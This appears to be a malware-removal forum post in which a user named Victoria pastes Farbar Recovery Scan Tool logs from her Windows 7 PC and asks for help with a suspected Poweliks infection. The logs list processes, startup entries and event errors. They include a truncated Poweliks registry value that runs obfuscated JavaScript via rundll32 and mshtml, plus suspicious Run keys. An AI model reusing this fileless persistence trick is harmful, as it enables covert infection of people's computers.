(x86)\Google\Chrome\Application\37.0.2062.120\libegl.dll 2014-09-11 13:38 - 2014-09-03 23:01 - 08577864 _____ () C:\Program Files (x86)\Google\Chrome\Application\37.0.2062.120\pdf.dll 2014-09-11 13:38 - 2014-09-03 23:01 - 00331592 _____ () C:\Program Files (x86)\Google\Chrome\Application\37.0.2062.120\ppGoogleNaClPluginChrome.dll 2014-09-11 13:38 - 2014-09-03 23:01 - 01660232 _____ () C:\Program Files (x86)\Google\Chrome\Application\37.0.2062.120\ffmpegsumo.dll ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) AlternateDataStreams: C:\ProgramData\TEMP:56E2E879 AlternateDataStreams: C:\Users\Victoria\Downloads\Project Neptune Test Email.eml:OECustomProperty AlternateDataStreams: C:\Users\Victoria\Downloads\[First Run] Neptune - BERNARD - Bernard (1).eml:OECustomProperty AlternateDataStreams: C:\Users\Victoria\Downloads\[First Run] Neptune - BERNARD - Bernard (2).eml:OECustomProperty AlternateDataStreams: C:\Users\Victoria\Downloads\[First Run] Neptune - BERNARD - Bernard.eml:OECustomProperty ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver" ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) MSCONFIG\startupreg: Shop To Win => C:\Program Files (x86)\Shop To Win\ShopToWin.exe ==================== Faulty Device Manager Devices ============= Name: DW1525 (802.11n) WLAN PCIe Card Description: DW1525 (802.11n) WLAN PCIe Card Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: Atheros Communications Inc. Service: athr Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Event log errors: ========================= Application errors: ================== Error: (09/15/2014 07:29:18 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 11.0.9600.17207, time stamp: 0x4a5bc6b7 Faulting module name: MSHTML.dll, version: 11.0.9600.17207, time stamp: 0x53a22b71 Exception code: 0xc00000fd Fault offset: 0x000f9575 Faulting process id: 0x1c30 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Error: (09/15/2014 05:23:36 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 11.0.9600.17207, time stamp: 0x4a5bc6b7 Faulting module name: MSHTML.dll, version: 11.0.9600.17207, time stamp: 0x53a22b71 Exception code: 0xc00000fd Fault offset: 0x000f84f6 Faulting process id: 0xe0c Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Error: (09/15/2014 05:09:35 PM) (Source: BstHdAndroidSvc) (EventID: 0) (User: ) Description: Service cannot be started. System.ApplicationException: Cannot start service. Service did not stop gracefully the last time it was run. at BlueStacks.hyperDroid.Service.Service.OnStart(String[] args) at System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state) Error: (09/15/2014 05:08:01 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000001f4,(null),0,REG_BINARY,0000000001D9F0B0.72). hr = 0x80070005, Access is denied. . Error: (09/15/2014 05:08:01 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000744,(null),0,REG_BINARY,0000000003B8E3D0.72). hr = 0x80070005, Access is denied. . Operation: BackupShutdown Event Context: Execution Context: Writer Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0} Writer Name: WMI Writer Writer Instance ID: {f5e0dea4-1987-41f4-a9fb-c614e31a2eed} Error: (09/15/2014 05:08:01 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000d78,(null),0,REG_BINARY,000000000158E2D0.72). hr = 0x80070005, Access is denied. . Operation: BackupShutdown Event Context: Execution Context: Writer Writer Class Id: {cd3f2362-8bef-46c7-9181-d62844cdc0b2} Writer Name: MSSearch Service Writer Writer Instance ID: {07bb7b30-af03-4af3-864a-7c8ad1e6f4c4} Error: (09/15/2014 05:08:01 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000308,(null),0,REG_BINARY,0000000002CDE2F0.72). hr = 0x80070005, Access is denied. . Operation: BackupShutdown Event Context: Execution Context: Writer Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220} Writer Name: System Writer Writer Instance ID: {a99fe23a-d659-4072-b1a4-80ba54adb86f} Error: (09/15/2014 05:08:01 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000001b4,SYSTEM\CurrentControlSet\Services\VSS\Diag\COM+ REGDB Writer,0,REG_BINARY,0000000000FDF4C0.72). hr = 0x80070005, Access is denied. . Operation: BackupShutdown Event Context: Execution Context: Writer Writer Class Id: {542da469-d3e1-473c-9f4f-7847f01fc64f} Writer Name: COM+ REGDB Writer Writer Instance ID: {57194913-0a6b-456e-b79b-e6855b78dae6} Error: (09/15/2014 05:08:01 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000744,(null),0,REG_BINARY,0000000003B8E3D0.72). hr = 0x80070005, Access is denied. . Operation: BackupShutdown Event Context: Execution Context: Writer Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0} Writer Name: WMI Writer Writer Instance ID: {f5e0dea4-1987-41f4-a9fb-c614e31a2eed} Error: (09/15/2014 05:08:01 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000001a8,SYSTEM\CurrentControlSet\Services\VSS\Diag\Registry Writer,0,REG_BINARY,000000000208E9B0.72). hr = 0x80070005, Access is denied. . Operation: BackupShutdown Event Context: Execution Context: Writer Writer Class Id: {afbab4a2-367d-4d15-a586-71dbb18f8485} Writer Name: Registry Writer Writer Instance ID: {7e4df222-dec0-4ff5-997c-00468346dad7} System errors: ============= Error: (09/15/2014 07:11:13 PM) (Source: Service Control Manager) (EventID: 7011) (User: ) Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the SftService service. Error: (09/15/2014 07:10:30 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (09/15/2014 06:40:05 PM) (Source: Service Control Manager) (EventID: 7011) (User: ) Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the SftService service. Error: (09/15/2014 06:22:59 PM) (Source: Service Control Manager) (EventID: 7011) (User: ) Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the SftService service. Error: (09/15/2014 06:07:05 PM) (Source: Service Control Manager) (EventID: 7011) (User: ) Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the SftService service. Error: (09/15/2014 05:12:42 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (09/15/2014 05:10:23 PM) (Source: Service Control Manager) (EventID: 7011) (User: ) Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the SftService service. Error: (09/15/2014 05:09:43 PM) (Source: Service Control Manager) (EventID: 7024) (User: ) Description: The HitmanPro 3.7 Crusader (Boot) service terminated with service-specific error %%0. Error: (09/15/2014 05:09:35 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: The BlueStacks Android Service service terminated with the following error: %%1064 Error: (09/15/2014 05:09:35 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The vToolbarUpdater18.1.9 service failed to start due to the following error: %%2 Microsoft Office Sessions: ========================= Error: (09/15/2014 07:29:18 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe11.0.9600.172074a5bc6b7MSHTML.dll11.0.9600.1720753a22b71c00000fd000f95751c3001cfd13c45e93578C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll1cb74601-3d30-11e4-bae2-842b2baf6f10 Error: (09/15/2014 05:23:36 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe11.0.9600.172074a5bc6b7MSHTML.dll11.0.9600.1720753a22b71c00000fd000f84f6e0c01cfd12a9fa5f4c9C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll8d1be4da-3d1e-11e4-bae2-842b2baf6f10 Error: (09/15/2014 05:09:35 PM) (Source: BstHdAndroidSvc) (EventID: 0) (User: ) Description: Service cannot be started. System.ApplicationException: Cannot start service. Service did not stop gracefully the last time it was run. at BlueStacks.hyperDroid.Service.Service.OnStart(String[] args) at System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state) Error: (09/15/2014 05:08:01 PM) (Source: VSS) (EventID: 8193) (User: ) Description: RegSetValueExW(0x000001f4,(null),0,REG_BINARY,0000000001D9F0B0.72)0x80070005, Access is denied. Error: (09/15/2014 05:08:01 PM) (Source: VSS) (EventID: 8193) (User: ) Description: RegSetValueExW(0x00000744,(null),0,REG_BINARY,0000000003B8E3D0.72)0x80070005, Access is denied. Operation: BackupShutdown Event Context: Execution Context: Writer Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0} Writer Name: WMI Writer Writer Instance ID: {f5e0dea4-1987-41f4-a9fb-c614e31a2eed} Error: (09/15/2014 05:08:01 PM) (Source: VSS) (EventID: 8193) (User: ) Description: RegSetValueExW(0x00000d78,(null),0,REG_BINARY,000000000158E2D0.72)0x80070005, Access is denied. Operation: BackupShutdown Event Context: Execution Context: Writer Writer Class Id: {cd3f2362-8bef-46c7-9181-d62844cdc0b2} Writer Name: MSSearch Service Writer Writer Instance ID: {07bb7b30-af03-4af3-864a-7c8ad1e6f4c4} Error: (09/15/2014 05:08:01 PM) (Source: VSS) (EventID: 8193) (User: ) Description: RegSetValueExW(0x00000308,(null),0,REG_BINARY,0000000002CDE2F0.72)0x80070005, Access is denied. Operation: BackupShutdown Event Context: Execution Context: Writer Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220} Writer Name: System Writer Writer Instance ID: {a99fe23a-d659-4072-b1a4-80ba54adb86f} Error: (09/15/2014 05:08:01 PM) (Source: VSS) (EventID: 8193) (User: ) Description: RegSetValueExW(0x000001b4,SYSTEM\CurrentControlSet\Services\VSS\Diag\COM+ REGDB Writer,0,REG_BINARY,0000000000FDF4C0.72)0x80070005, Access is denied. Operation: BackupShutdown Event Context: Execution Context: Writer Writer Class Id: {542da469-d3e1-473c-9f4f-7847f01fc64f} Writer Name: COM+ REGDB Writer Writer Instance ID: {57194913-0a6b-456e-b79b-e6855b78dae6} Error: (09/15/2014 05:08:01 PM) (Source: VSS) (EventID: 8193) (User: ) Description: RegSetValueExW(0x00000744,(null),0,REG_BINARY,0000000003B8E3D0.72)0x80070005, Access is denied. Operation: BackupShutdown Event Context: Execution Context: Writer Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0} Writer Name: WMI Writer Writer Instance ID: {f5e0dea4-1987-41f4-a9fb-c614e31a2eed} Error: (09/15/2014 05:08:01 PM) (Source: VSS) (EventID: 8193) (User: ) Description: RegSetValueExW(0x000001a8,SYSTEM\CurrentControlSet\Services\VSS\Diag\Registry Writer,0,REG_BINARY,000000000208E9B0.72)0x80070005, Access is denied. Operation: BackupShutdown Event Context: Execution Context: Writer Writer Class Id: {afbab4a2-367d-4d15-a586-71dbb18f8485} Writer Name: Registry Writer Writer Instance ID: {7e4df222-dec0-4ff5-997c-00468346dad7} CodeIntegrity Errors: =================================== Date: 2012-12-08 09:12:43.331 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\Unlocker\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2012-12-08 09:12:43.253 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\Unlocker\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2012-12-08 09:12:43.175 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\Unlocker\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2012-12-08 09:12:43.112 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\Unlocker\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2012-12-08 09:12:09.306 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\Unlocker\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2012-12-08 09:12:09.236 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\Unlocker\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2012-12-08 09:12:09.166 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\Unlocker\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2012-12-08 09:12:09.096 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\Unlocker\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2012-12-08 09:11:48.756 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\Unlocker\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2012-12-08 09:11:48.686 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\Unlocker\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Memory info =========================== Processor: Intel® Core i5 CPU 760 @ 2.80GHz Percentage of memory in use: 68% Total physical RAM: 6103.12 MB Available physical RAM: 1946.8 MB Total Pagefile: 12204.41 MB Available Pagefile: 6969.76 MB Total Virtual: 8192 MB Available Virtual: 8191.83 MB ==================== Drives ================================ Drive c: (OS) (Fixed) (Total:920.03 GB) (Free:315.62 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (Size: 931.5 GB) (Disk ID: 259D4594) Partition 1: (Not Active) - (Size=39 MB) - (Type=DE) Partition 2: (Active) - (Size=11.4 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=920 GB) - (Type=07 NTFS) ==================== End Of Log ============================ i think i have some virus called Poweliks

here are my farbar recovery logs and addition logs: Farbar: Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 12-09-2014Ran by Victoria (administrator) on VICTORIA-PC on 15-09-2014 21:49:48Running from C:\Users\Victoria\Desktop\New folder (7)Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)Internet Explorer Version 11Boot Mode: NormalTutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (IBM Corp.) C:\Program Files (x86)\Trusteer\Rapport\bin\RapportMgmtService.exe(AMD) C:\Windows\System32\atiesrxx.exe(AMD) C:\Windows\System32\atieclxx.exe(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE(Atheros Commnucations) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe(SEIKO EPSON CORPORATION) C:\ProgramData\EPSON\EPW!3 SSRP\E_S40STB.EXE(SEIKO EPSON CORPORATION) C:\ProgramData\EPSON\EPW!3 SSRP\E_S40RPB.EXE( ) C:\Windows\System32\lxddcoms.exe(McAfee, Inc.) C:\Windows\System32\mfevtps.exe() C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe(RealNetworks, Inc.) C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin\rpdsvc.exe() C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe(Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE(SoftThinks SAS) C:\Program Files (x86)\Dell DataSafe Local Backup\SftService.exe(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE(Yahoo! Inc.) C:\Program Files (x86)\Yahoo!\SoftwareUpdate\YahooAUService.exe(Atheros) C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe(SoftThinks - Dell) C:\Program Files (x86)\Dell DataSafe Local Backup\Toaster.exe(SoftThinks - Dell) C:\Program Files (x86)\Dell DataSafe Local Backup\Components\DSUpdate\DSUpd.exe() C:\Program Files (x86)\Dell DataSafe Local Backup\Components\Scheduler\STService.exe(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.24.15\GoogleCrashHandler.exe(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.24.15\GoogleCrashHandler64.exe(IBM Corp.) C:\Program Files (x86)\Trusteer\Rapport\bin\RapportService.exe(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE() C:\Program Files (x86)\Lexmark 2500 Series\lxddmon.exe() C:\Program Files (x86)\Lexmark 2500 Series\lxddamon.exe(Atheros Commnucations) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe(Atheros Commnucations) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AthBtTray.exe(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe(PC Drivers Headquarters) C:\Program Files (x86)\DriverBoost\DriverBoost\DriverBoost.exe(DT Soft Ltd) C:\Program Files (x86)\DAEMON Tools Pro\DTShellHlp.exe(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.130\SSScheduler.exe() C:\Program Files (x86)\NETGEAR\WG111v2\WG111v2.exe() C:\Program Files (x86)\NETGEAR\WG111v2\WG111v2.exe(RealNetworks, Inc.) C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin64\rpsystray.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements 12 Organizer\PhotoshopElementsFileAgent.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Microsoft Corporation) C:\Windows\System32\taskmgr.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe(Mine) C:\ProgramData\Windows Genuine Advantage\{838DDB36-BAB4-47D1-9508-78FA20CB9780}\msiexec.exe(Microsoft Corporation) C:\Windows\System32\prevhost.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe(Microsoft Corporation) C:\Windows\System32\dllhost.exe(Microsoft Corporation) C:\Windows\System32\dllhost.exe(Farbar) C:\Users\Victoria\Desktop\New folder (7)\FRST64 (2).exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [lxddmon.exe] => C:\Program Files (x86)\Lexmark 2500 Series\lxddmon.exe [291496 2009-04-27] ()HKLM\...\Run: [lxddamon] => C:\Program Files (x86)\Lexmark 2500 Series\lxddamon.exe [25256 2009-04-27] ()HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\btvstack.exe [1023104 2013-02-06] (Atheros Commnucations)HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\athbttray.exe [801920 2013-02-06] (Atheros Commnucations)HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [472984 2013-06-03] (Adobe Systems Incorporated)HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13671640 1999-12-31] (Realtek Semiconductor)HKLM-x32\...\Run: [sDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)HKLM-x32\...\RunOnce: ["C:\Program Files (x86)\Dell DataSafe Local Backup\Components\DSUpdate\DSUpdate.exe"] => C:\Program Files (x86)\Dell DataSafe Local Backup\Components\DSUpdate\DSUpdate.exe [560128 2011-09-26] (Dell)Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist\514\G2AWinLogon_x64.dll [X]Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]HKU\.DEFAULT\...\RunOnce: [spUninstallDeleteDir] => rmdir /s /q "\SearchProtect"HKU\S-1-5-21-2698232268-2154043033-3228781758-1000\...\Run: [DriverBoost] => C:\Program Files (x86)\DriverBoost\DriverBoost\DriverBoost.exe [3979632 2013-10-24] (PC Drivers Headquarters)HKU\S-1-5-21-2698232268-2154043033-3228781758-1000\...\Run: [.tluafed** <*>] => C:\Users\Victoria\Application Data\{00007DD8-641C-73CB-7D97-6695673F7C6A}.ex <===== ATTENTION (Value Name with invalid characters)HKU\S-1-5-21-2698232268-2154043033-3228781758-1000\...\Run: [Loumkeobosude] => "C:\Users\Victoria\AppData\Roaming\Emnaky\igyqow.exe"HKU\S-1-5-21-2698232268-2154043033-3228781758-1000\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_12_0_0_38_ActiveX.exe [840072 2014-01-20] (Adobe Systems Incorporated)HKU\S-1-5-21-2698232268-2154043033-3228781758-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!HKU\S-1-5-21-2698232268-2154043033-3228781758-501\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-11-29] (Google Inc.)HKU\S-1-5-21-2698232268-2154043033-3228781758-501\...\Run: [EPSON NX410 Series] => C:\Windows\system32\spool\DRIVERS\x64\3\E_IATIFCA.EXE [223232 2008-10-01] (SEIKO EPSON CORPORATION)HKU\S-1-5-21-2698232268-2154043033-3228781758-501\...\Run: [msnmsgr] => C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe [4272624 2013-02-05] (Microsoft Corporation)HKU\S-1-5-21-2698232268-2154043033-3228781758-501\...\Run: [DAEMON Tools Pro Agent] => C:\Program Files (x86)\DAEMON Tools Pro\DTAgent.exe [4527424 2011-08-17] (DT Soft Ltd)HKU\S-1-5-21-2698232268-2154043033-3228781758-501\...\Run: [DriverFinder] => C:\Program Files (x86)\DriverFinder\DriverFinder.exe [7151816 2011-07-18] ()HKU\S-1-5-21-2698232268-2154043033-3228781758-501\...\Run: [sUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [6563096 2014-01-03] (SUPERAntiSpyware)HKU\S-1-5-21-2698232268-2154043033-3228781758-501\...\Run: [PC Speed Maximizer] => "C:\Program Files (x86)\PC Speed Maximizer\SPMStarter.exe"HKU\S-1-5-21-2698232268-2154043033-3228781758-501\...\Run: [sPMTray] => "C:\Program Files (x86)\PC Speed Maximizer\SPMTray.exe"HKU\S-1-5-21-2698232268-2154043033-3228781758-501\...\Run: [Free Download Manager] => "C:\Program Files (x86)\Free Download Manager\fdm.exe" -autorunHKU\S-1-5-21-2698232268-2154043033-3228781758-501\...\Run: [DownloadAccelerator] => C:\Program Files (x86)\DAP\DAP.EXE [3774680 2012-07-22] (Speedbit Ltd.)HKU\S-1-5-21-2698232268-2154043033-3228781758-501\...\Run: [steam] => "C:\Program Files (x86)\Steam\Steam.exe" -silentHKU\S-1-5-21-2698232268-2154043033-3228781758-501\...\Run: [DriverBoost] => C:\Program Files (x86)\DriverBoost\DriverBoost\DriverBoost.exe [3979632 2013-10-24] (PC Drivers Headquarters)HKU\S-1-5-21-2698232268-2154043033-3228781758-501\...\RunOnce: [Application Restart #0] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-11-29] (Google Inc.)HKU\S-1-5-21-2698232268-2154043033-3228781758-501\...\MountPoints2: {a5b16509-4ed2-11e2-b331-842b2baf6f10} - I:\Install.exeStartup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnkShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.130\SSScheduler.exe (McAfee, Inc.)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WG111v2 Smart Wizard..lnkShortcutTarget: NETGEAR WG111v2 Smart Wizard..lnk -> C:\Program Files (x86)\NETGEAR\WG111v2\WG111v2.exe ()Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WG111v2 Smart Wizard.lnkShortcutTarget: NETGEAR WG111v2 Smart Wizard.lnk -> C:\Program Files (x86)\NETGEAR\WG111v2\WG111v2.exe ()Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RealPlayer Cloud Service UI.lnkShortcutTarget: RealPlayer Cloud Service UI.lnk -> C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin64\rpsystray.exe (RealNetworks, Inc.)Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnkShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnkShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnkShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\TheGuest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnkShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: 